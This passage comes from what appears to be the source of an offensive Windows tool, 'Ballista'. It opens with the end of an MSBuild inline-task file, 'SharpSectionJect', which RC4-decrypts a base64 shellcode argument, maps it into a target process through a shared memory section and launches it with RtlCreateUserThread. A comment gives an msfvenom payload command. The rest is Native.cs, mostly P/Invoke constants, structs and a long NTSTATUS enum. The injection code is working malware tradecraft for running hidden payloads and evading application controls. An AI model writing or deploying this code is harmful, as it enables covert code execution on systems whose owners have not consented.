PAGE_EXECUTE_READ); 113 | 114 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 115 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 116 | 117 | IntPtr targetThreadHandle = IntPtr.Zero; 118 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 119 | } 120 | else 121 | Console.WriteLine("Failed to open target process"); 122 | } 123 | else 124 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 125 | } 126 | else 127 | Console.WriteLine(@"Usage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe SharpSectionJect.xml"); 128 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 129 | } 130 | 131 | [DllImport("kernel32.dll", SetLastError = true)] 132 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 133 | 134 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 135 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 136 | 137 | [DllImport("ntdll.dll", SetLastError = true)] 138 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 139 | 140 | [DllImport("ntdll.dll", SetLastError = true)] 141 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 142 | } 143 | 144 | public class HelloThere : Task, 
ITask 145 | { 146 | public override bool Execute() 147 | { 148 | SharpSectionJect.Inj("", "", ""); 149 | return true; 150 | } 151 | } 152 | 153 | ]]> 154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /Ballista/Ballista/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | 5 | namespace Ballista 6 | { 7 | class Native 8 | { 9 | [DllImport("kernel32.dll")] 10 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 11 | 12 | /* Constants */ 13 | public const uint PAGE_EXECUTE_READ = 0x00000020, 14 | PAGE_EXECUTE_READWRITE = 0x00000040, 15 | PAGE_READWRITE = 0x00000004, 16 | 17 | PROCESS_ACCESS_ALL = 0x001F0FFF, 18 | 19 | SEC_COMMIT = 0x8000000, 20 | 21 | PROCESS_ALL_ACCESS = 0x001F0FFF; 22 | 23 | public const uint NORMAL_PRIORITY_CLASS = 0x0020, 24 | STARTF_USESHOWWINDOW = 0x0001; 25 | 26 | 27 | public const ushort SW_HIDE = 0x0000; 28 | 29 | public const UInt32 SECTION_MAP_WRITE = 0x0002, 30 | SECTION_MAP_READ = 0x0004, 31 | SECTION_MAP_EXECUTE = 0x0008, 32 | 33 | GENERIC_READ = 0x80000000, 34 | GENERIC_WRITE = 0x40000000, 35 | GENERIC_EXECUTE = 0x20000000; 36 | 37 | /* Structs */ 38 | [StructLayout(LayoutKind.Sequential)] 39 | public struct UNICODE_STRING : IDisposable 40 | { 41 | public ushort Length; 42 | public ushort MaximumLength; 43 | private IntPtr buffer; 44 | 45 | public UNICODE_STRING(string s) 46 | { 47 | Length = (ushort)(s.Length * 2); 48 | MaximumLength = (ushort)(Length + 2); 49 | buffer = Marshal.StringToHGlobalUni(s); 50 | } 51 | 52 | public void Dispose() 53 | { 54 | Marshal.FreeHGlobal(buffer); 55 | buffer = IntPtr.Zero; 56 | } 57 | 58 | public override string ToString() 59 | { 60 | return Marshal.PtrToStringUni(buffer); 61 | } 62 | } 63 | 64 | [StructLayout(LayoutKind.Sequential)] 65 | public struct OBJECT_ATTRIBUTES : 
IDisposable 66 | { 67 | public int Length; 68 | public IntPtr RootDirectory; 69 | private IntPtr objectName; 70 | public uint Attributes; 71 | public IntPtr SecurityDescriptor; 72 | public IntPtr SecurityQualityOfService; 73 | 74 | public OBJECT_ATTRIBUTES(string name, uint attrs) 75 | { 76 | Length = 0; 77 | RootDirectory = IntPtr.Zero; 78 | objectName = IntPtr.Zero; 79 | Attributes = attrs; 80 | SecurityDescriptor = IntPtr.Zero; 81 | SecurityQualityOfService = IntPtr.Zero; 82 | 83 | Length = Marshal.SizeOf(this); 84 | ObjectName = new UNICODE_STRING(name); 85 | } 86 | 87 | public UNICODE_STRING ObjectName 88 | { 89 | get 90 | { 91 | return (UNICODE_STRING)Marshal.PtrToStructure( 92 | objectName, typeof(UNICODE_STRING)); 93 | } 94 | 95 | set 96 | { 97 | bool fDeleteOld = objectName != IntPtr.Zero; 98 | if (!fDeleteOld) 99 | objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value)); 100 | Marshal.StructureToPtr(value, objectName, fDeleteOld); 101 | } 102 | } 103 | 104 | public void Dispose() 105 | { 106 | if (objectName != IntPtr.Zero) 107 | { 108 | Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING)); 109 | Marshal.FreeHGlobal(objectName); 110 | objectName = IntPtr.Zero; 111 | } 112 | } 113 | } 114 | public struct CLIENT_ID 115 | { 116 | public IntPtr UniqueProcess; 117 | public IntPtr UniqueThread; 118 | } 119 | 120 | [StructLayout(LayoutKind.Sequential)] 121 | public struct SECURITY_ATTRIBUTES 122 | { 123 | public int nLength; 124 | public IntPtr lpSecurityDescriptor; 125 | } 126 | 127 | /* Enums */ 128 | public enum NTSTATUS : uint 129 | { 130 | // Success 131 | Success = 0x00000000, 132 | Wait0 = 0x00000000, 133 | Wait1 = 0x00000001, 134 | Wait2 = 0x00000002, 135 | Wait3 = 0x00000003, 136 | Wait63 = 0x0000003f, 137 | Abandoned = 0x00000080, 138 | AbandonedWait0 = 0x00000080, 139 | AbandonedWait1 = 0x00000081, 140 | AbandonedWait2 = 0x00000082, 141 | AbandonedWait3 = 0x00000083, 142 | AbandonedWait63 = 0x000000bf, 143 | UserApc = 0x000000c0, 144 | 
KernelApc = 0x00000100, 145 | Alerted = 0x00000101, 146 | Timeout = 0x00000102, 147 | Pending = 0x00000103, 148 | Reparse = 0x00000104, 149 | MoreEntries = 0x00000105, 150 | NotAllAssigned = 0x00000106, 151 | SomeNotMapped = 0x00000107, 152 | OpLockBreakInProgress = 0x00000108, 153 | VolumeMounted = 0x00000109, 154 | RxActCommitted = 0x0000010a, 155 | NotifyCleanup = 0x0000010b, 156 | NotifyEnumDir = 0x0000010c, 157 | NoQuotasForAccount = 0x0000010d, 158 | PrimaryTransportConnectFailed = 0x0000010e, 159 | PageFaultTransition = 0x00000110, 160 | PageFaultDemandZero = 0x00000111, 161 | PageFaultCopyOnWrite = 0x00000112, 162 | PageFaultGuardPage = 0x00000113, 163 | PageFaultPagingFile = 0x00000114, 164 | CrashDump = 0x00000116, 165 | ReparseObject = 0x00000118, 166 | NothingToTerminate = 0x00000122, 167 | ProcessNotInJob = 0x00000123, 168 | ProcessInJob = 0x00000124, 169 | ProcessCloned = 0x00000129, 170 | FileLockedWithOnlyReaders = 0x0000012a, 171 | FileLockedWithWriters = 0x0000012b, 172 | 173 | // Informational 174 | Informational = 0x40000000, 175 | ObjectNameExists = 0x40000000, 176 | ThreadWasSuspended = 0x40000001, 177 | WorkingSetLimitRange = 0x40000002, 178 | ImageNotAtBase = 0x40000003, 179 | RegistryRecovered = 0x40000009, 180 | 181 | // Warning 182 | Warning = 0x80000000, 183 | GuardPageViolation = 0x80000001, 184 | DatatypeMisalignment = 0x80000002, 185 | Breakpoint = 0x80000003, 186 | SingleStep = 0x80000004, 187 | BufferOverflow = 0x80000005, 188 | NoMoreFiles = 0x80000006, 189 | HandlesClosed = 0x8000000a, 190 | PartialCopy = 0x8000000d, 191 | DeviceBusy = 0x80000011, 192 | InvalidEaName = 0x80000013, 193 | EaListInconsistent = 0x80000014, 194 | NoMoreEntries = 0x8000001a, 195 | LongJump = 0x80000026, 196 | DllMightBeInsecure = 0x8000002b, 197 | 198 | // Error 199 | Error = 0xc0000000, 200 | Unsuccessful = 0xc0000001, 201 | NotImplemented = 0xc0000002, 202 | InvalidInfoClass = 0xc0000003, 203 | InfoLengthMismatch = 0xc0000004, 204 | AccessViolation = 
0xc0000005, 205 | InPageError = 0xc0000006, 206 | PagefileQuota = 0xc0000007, 207 | InvalidHandle = 0xc0000008, 208 | BadInitialStack = 0xc0000009, 209 | BadInitialPc = 0xc000000a, 210 | InvalidCid = 0xc000000b, 211 | TimerNotCanceled = 0xc000000c, 212 | InvalidParameter = 0xc000000d, 213 | NoSuchDevice = 0xc000000e, 214 | NoSuchFile = 0xc000000f, 215 | InvalidDeviceRequest = 0xc0000010, 216 | EndOfFile = 0xc0000011, 217 | WrongVolume = 0xc0000012, 218 | NoMediaInDevice = 0xc0000013, 219 | NoMemory = 0xc0000017, 220 | NotMappedView = 0xc0000019, 221 | UnableToFreeVm = 0xc000001a, 222 | UnableToDeleteSection = 0xc000001b, 223 | IllegalInstruction = 0xc000001d, 224 | AlreadyCommitted = 0xc0000021, 225 | AccessDenied = 0xc0000022, 226 | BufferTooSmall = 0xc0000023, 227 | ObjectTypeMismatch = 0xc0000024, 228 | NonContinuableException = 0xc0000025, 229 | BadStack = 0xc0000028, 230 | NotLocked = 0xc000002a, 231 | NotCommitted = 0xc000002d, 232 | InvalidParameterMix = 0xc0000030, 233 | ObjectNameInvalid = 0xc0000033, 234 | ObjectNameNotFound = 0xc0000034, 235 | ObjectNameCollision = 0xc0000035, 236 | ObjectPathInvalid = 0xc0000039, 237 | ObjectPathNotFound = 0xc000003a, 238 | ObjectPathSyntaxBad = 0xc000003b, 239 | DataOverrun = 0xc000003c, 240 | DataLate = 0xc000003d, 241 | DataError = 0xc000003e, 242 | CrcError = 0xc000003f, 243 | SectionTooBig = 0xc0000040, 244 | PortConnectionRefused = 0xc0000041, 245 | InvalidPortHandle = 0xc0000042, 246 | SharingViolation = 0xc0000043, 247 | QuotaExceeded = 0xc0000044, 248 | InvalidPageProtection = 0xc0000045, 249 | MutantNotOwned = 0xc0000046, 250 | SemaphoreLimitExceeded = 0xc0000047, 251 | PortAlreadySet = 0xc0000048, 252 | SectionNotImage = 0xc0000049, 253 | SuspendCountExceeded = 0xc000004a, 254 | ThreadIsTerminating = 0xc000004b, 255 | BadWorkingSetLimit = 0xc000004c, 256 | IncompatibleFileMap = 0xc000004d, 257 | SectionProtection = 0xc000004e, 258 | EasNotSupported = 0xc000004f, 259 | EaTooLarge = 0xc0000050, 260 | 
NonExistentEaEntry = 0xc0000051, 261 | NoEasOnFile = 0xc0000052, 262 | EaCorruptError = 0xc0000053, 263 | FileLockConflict = 0xc0000054, 264 | LockNotGranted = 0xc0000055, 265 | DeletePending = 0xc0000056, 266 | CtlFileNotSupported = 0xc0000057, 267 | UnknownRevision = 0xc0000058, 268 | RevisionMismatch = 0xc0000059, 269 | InvalidOwner = 0xc000005a, 270 | InvalidPrimaryGroup = 0xc000005b, 271 | NoImpersonationToken = 0xc000005c, 272 | CantDisableMandatory = 0xc000005d, 273 | NoLogonServers = 0xc000005e, 274 | NoSuchLogonSession = 0xc000005f, 275 | NoSuchPrivilege = 0xc0000060, 276 | PrivilegeNotHeld = 0xc0000061, 277 | InvalidAccountName = 0xc0000062, 278 | UserExists = 0xc0000063, 279 | NoSuchUser = 0xc0000064, 280 | GroupExists = 0xc0000065, 281 | NoSuchGroup = 0xc0000066, 282 | MemberInGroup = 0xc0000067, 283 | MemberNotInGroup = 0xc0000068, 284 | LastAdmin = 0xc0000069, 285 | WrongPassword = 0xc000006a, 286 | IllFormedPassword = 0xc000006b, 287 | PasswordRestriction = 0xc000006c, 288 | LogonFailure = 0xc000006d, 289 | AccountRestriction = 0xc000006e, 290 | InvalidLogonHours = 0xc000006f, 291 | InvalidWorkstation = 0xc0000070, 292 | PasswordExpired = 0xc0000071, 293 | AccountDisabled = 0xc0000072, 294 | NoneMapped = 0xc0000073, 295 | TooManyLuidsRequested = 0xc0000074, 296 | LuidsExhausted = 0xc0000075, 297 | InvalidSubAuthority = 0xc0000076, 298 | InvalidAcl = 0xc0000077, 299 | InvalidSid = 0xc0000078, 300 | InvalidSecurityDescr = 0xc0000079, 301 | ProcedureNotFound = 0xc000007a, 302 | InvalidImageFormat = 0xc000007b, 303 | NoToken = 0xc000007c, 304 | BadInheritanceAcl = 0xc000007d, 305 | RangeNotLocked = 0xc000007e, 306 | DiskFull = 0xc000007f, 307 | ServerDisabled = 0xc0000080, 308 | ServerNotDisabled = 0xc0000081, 309 | TooManyGuidsRequested = 0xc0000082, 310 | GuidsExhausted = 0xc0000083, 311 | InvalidIdAuthority = 0xc0000084, 312 | AgentsExhausted = 0xc0000085, 313 | InvalidVolumeLabel = 0xc0000086, 314 | SectionNotExtended = 0xc0000087, 315 | 
NotMappedData = 0xc0000088, 316 | ResourceDataNotFound = 0xc0000089, 317 | ResourceTypeNotFound = 0xc000008a, 318 | ResourceNameNotFound = 0xc000008b, 319 | ArrayBoundsExceeded = 0xc000008c, 320 | FloatDenormalOperand = 0xc000008d, 321 | FloatDivideByZero = 0xc000008e, 322 | FloatInexactResult = 0xc000008f, 323 | FloatInvalidOperation = 0xc0000090, 324 | FloatOverflow = 0xc0000091, 325 | FloatStackCheck = 0xc0000092, 326 | FloatUnderflow = 0xc0000093, 327 | IntegerDivideByZero = 0xc0000094, 328 | IntegerOverflow = 0xc0000095, 329 | PrivilegedInstruction = 0xc0000096, 330 | TooManyPagingFiles = 0xc0000097, 331 | FileInvalid = 0xc0000098, 332 | InstanceNotAvailable = 0xc00000ab, 333 | PipeNotAvailable = 0xc00000ac, 334 | InvalidPipeState = 0xc00000ad, 335 | PipeBusy = 0xc00000ae, 336 | IllegalFunction = 0xc00000af, 337 | PipeDisconnected = 0xc00000b0, 338 | PipeClosing = 0xc00000b1, 339 | PipeConnected = 0xc00000b2, 340 | PipeListening = 0xc00000b3, 341 | InvalidReadMode = 0xc00000b4, 342 | IoTimeout = 0xc00000b5, 343 | FileForcedClosed = 0xc00000b6, 344 | ProfilingNotStarted = 0xc00000b7, 345 | ProfilingNotStopped = 0xc00000b8, 346 | NotSameDevice = 0xc00000d4, 347 | FileRenamed = 0xc00000d5, 348 | CantWait = 0xc00000d8, 349 | PipeEmpty = 0xc00000d9, 350 | CantTerminateSelf = 0xc00000db, 351 | InternalError = 0xc00000e5, 352 | InvalidParameter1 = 0xc00000ef, 353 | InvalidParameter2 = 0xc00000f0, 354 | InvalidParameter3 = 0xc00000f1, 355 | InvalidParameter4 = 0xc00000f2, 356 | InvalidParameter5 = 0xc00000f3, 357 | InvalidParameter6 = 0xc00000f4, 358 | InvalidParameter7 = 0xc00000f5, 359 | InvalidParameter8 = 0xc00000f6, 360 | InvalidParameter9 = 0xc00000f7, 361 | InvalidParameter10 = 0xc00000f8, 362 | InvalidParameter11 = 0xc00000f9, 363 | InvalidParameter12 = 0xc00000fa, 364 | MappedFileSizeZero = 0xc000011e, 365 | TooManyOpenedFiles = 0xc000011f, 366 | Cancelled = 0xc0000120, 367 | CannotDelete = 0xc0000121, 368 | InvalidComputerName = 0xc0000122, 369 | FileDeleted 
= 0xc0000123, 370 | SpecialAccount = 0xc0000124, 371 | SpecialGroup = 0xc0000125, 372 | SpecialUser = 0xc0000126, 373 | MembersPrimaryGroup = 0xc0000127, 374 | FileClosed = 0xc0000128, 375 | TooManyThreads = 0xc0000129, 376 | ThreadNotInProcess = 0xc000012a, 377 | TokenAlreadyInUse = 0xc000012b, 378 | PagefileQuotaExceeded = 0xc000012c, 379 | CommitmentLimit = 0xc000012d, 380 | InvalidImageLeFormat = 0xc000012e, 381 | InvalidImageNotMz = 0xc000012f, 382 | InvalidImageProtect = 0xc0000130, 383 | InvalidImageWin16 = 0xc0000131, 384 | LogonServer = 0xc0000132, 385 | DifferenceAtDc = 0xc0000133, 386 | SynchronizationRequired = 0xc0000134, 387 | DllNotFound = 0xc0000135, 388 | IoPrivilegeFailed = 0xc0000137, 389 | OrdinalNotFound = 0xc0000138, 390 | EntryPointNotFound = 0xc0000139, 391 | ControlCExit = 0xc000013a, 392 | PortNotSet = 0xc0000353, 393 | DebuggerInactive = 0xc0000354, 394 | CallbackBypass = 0xc0000503, 395 | PortClosed = 0xc0000700, 396 | MessageLost = 0xc0000701, 397 | InvalidMessage = 0xc0000702, 398 | RequestCanceled = 0xc0000703, 399 | RecursiveDispatch = 0xc0000704, 400 | LpcReceiveBufferExpected = 0xc0000705, 401 | LpcInvalidConnectionUsage = 0xc0000706, 402 | LpcRequestsNotAllowed = 0xc0000707, 403 | ResourceInUse = 0xc0000708, 404 | ProcessIsProtected = 0xc0000712, 405 | VolumeDirty = 0xc0000806, 406 | FileCheckedOut = 0xc0000901, 407 | CheckOutRequired = 0xc0000902, 408 | BadFileType = 0xc0000903, 409 | FileTooLarge = 0xc0000904, 410 | FormsAuthRequired = 0xc0000905, 411 | VirusInfected = 0xc0000906, 412 | VirusDeleted = 0xc0000907, 413 | TransactionalConflict = 0xc0190001, 414 | InvalidTransaction = 0xc0190002, 415 | TransactionNotActive = 0xc0190003, 416 | TmInitializationFailed = 0xc0190004, 417 | RmNotActive = 0xc0190005, 418 | RmMetadataCorrupt = 0xc0190006, 419 | TransactionNotJoined = 0xc0190007, 420 | DirectoryNotRm = 0xc0190008, 421 | CouldNotResizeLog = 0xc0190009, 422 | TransactionsUnsupportedRemote = 0xc019000a, 423 | 
LogResizeInvalidSize = 0xc019000b, 424 | RemoteFileVersionMismatch = 0xc019000c, 425 | CrmProtocolAlreadyExists = 0xc019000f, 426 | TransactionPropagationFailed = 0xc0190010, 427 | CrmProtocolNotFound = 0xc0190011, 428 | TransactionSuperiorExists = 0xc0190012, 429 | TransactionRequestNotValid = 0xc0190013, 430 | TransactionNotRequested = 0xc0190014, 431 | TransactionAlreadyAborted = 0xc0190015, 432 | TransactionAlreadyCommitted = 0xc0190016, 433 | TransactionInvalidMarshallBuffer = 0xc0190017, 434 | CurrentTransactionNotValid = 0xc0190018, 435 | LogGrowthFailed = 0xc0190019, 436 | ObjectNoLongerExists = 0xc0190021, 437 | StreamMiniversionNotFound = 0xc0190022, 438 | StreamMiniversionNotValid = 0xc0190023, 439 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 440 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 441 | CantCreateMoreStreamMiniversions = 0xc0190026, 442 | HandleNoLongerValid = 0xc0190028, 443 | NoTxfMetadata = 0xc0190029, 444 | LogCorruptionDetected = 0xc0190030, 445 | CantRecoverWithHandleOpen = 0xc0190031, 446 | RmDisconnected = 0xc0190032, 447 | EnlistmentNotSuperior = 0xc0190033, 448 | RecoveryNotNeeded = 0xc0190034, 449 | RmAlreadyStarted = 0xc0190035, 450 | FileIdentityNotPersistent = 0xc0190036, 451 | CantBreakTransactionalDependency = 0xc0190037, 452 | CantCrossRmBoundary = 0xc0190038, 453 | TxfDirNotEmpty = 0xc0190039, 454 | IndoubtTransactionsExist = 0xc019003a, 455 | TmVolatile = 0xc019003b, 456 | RollbackTimerExpired = 0xc019003c, 457 | TxfAttributeCorrupt = 0xc019003d, 458 | EfsNotAllowedInTransaction = 0xc019003e, 459 | TransactionalOpenNotAllowed = 0xc019003f, 460 | TransactedMappingUnsupportedRemote = 0xc0190040, 461 | TxfMetadataAlreadyPresent = 0xc0190041, 462 | TransactionScopeCallbacksNotSet = 0xc0190042, 463 | TransactionRequiredPromotion = 0xc0190043, 464 | CannotExecuteFileInTransaction = 0xc0190044, 465 | TransactionsNotFrozen = 0xc0190045, 466 | 467 | MaximumNtStatus = 0xffffffff 468 | } 469 | 470 | } 471 | } 